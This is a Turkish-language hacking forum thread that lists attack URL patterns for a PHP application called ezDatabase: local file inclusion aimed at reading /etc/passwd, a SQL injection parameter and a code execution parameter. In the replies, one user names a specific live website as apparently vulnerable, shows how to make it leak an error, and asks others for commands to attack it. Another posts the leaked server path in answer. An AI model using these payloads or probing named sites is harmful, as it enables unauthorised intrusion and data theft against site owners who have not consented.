ezDatabase Remote Code [ Kod calistirmak Yani ]

[Phara0h]

ezDatabase'te Bir GuvenLik Acigi Var

Examples Örnek Yani =)

FiLe Include
/index.php?p=../Local file [ etc/passwd yazmayi deneyin... ]

SQL Injection

/index.php?p=getcat&db_id=[SQL]

Code CaListirma

/index.php?p=getcat&db_id=1&cat_id=

[/B]

 

[Partizan]

Very nice .. tabi birde eviL Code'i buLmak Lazim dimi Phara0h =]

 

[w133]

Sağol phara0h güvenlik açıkları her geçen gün artıyo

 

[Superhacker21]

http://www.entrylevelpr.com/posts/index.php?p=
sitede o acıktan var sanırım ama hep dosya adı uzantılarını .php
yapıyor.
sol hatası verdırmek ıcın

http://www.entrylevelpr.com/posts/index.php?p=wertyy
yazabilirsiniz.

bu siteye ne yapabiliriz komutları iyi bilen örnek geniş komut listesi verirmisiniz bilen arkadaşlar.

 

[Partizan]

Warning: main(/var/www/html/posts/wertyy.php): failed to open stream: No such file or directory in /var/www/html/posts/index.php on line 92


Bu bahsettigin sitede Remote kodlar calismiyor demekki d0stum...